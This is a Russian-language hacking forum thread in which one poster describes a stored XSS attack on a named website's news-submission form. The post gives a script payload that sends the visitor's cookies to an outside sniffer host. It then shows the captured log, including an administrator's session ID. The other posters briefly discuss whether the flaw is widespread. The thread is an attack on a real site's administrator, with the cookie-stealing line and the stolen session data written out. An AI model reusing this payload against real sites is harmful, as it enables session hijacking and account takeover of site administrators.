Вот нашёл XSS на _http://whitep.net/ Сам скрипт который мы отсылаем в _http://whitep.net/modules.php (в добавлении новостей) Code: <script>img = new Image(); img.src = "http://s.netsec.ru/nofear/pic.gif?"+document.cookie;</script> Новость сначало отсылается администратору, затем только тогда он добавляет её сам, ну и ему получается приходит наше сообщение, затем мы просто принимаем куки на снифе: Code: Date 07.03.2006 15:02 IP *********** Real Ip *********** Referer http://whitep.net/modules.php Query modtids=,; forum_read=a:1:{i:3;i:1141736162;}; topicsread=a:1:{i:46;i:1141736168;}; session_id=24123b67852c03e898fdea85869bf25e; hotlog=1 Browser Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50
хм, наверно это на всех спайзах такое есть, где новости посылать можно... помоему там код видно будет еще...
А чё это за движёк? Всмысле видно? Невидно его, я же только что пробывал. P.S зайди в аську, дело есть!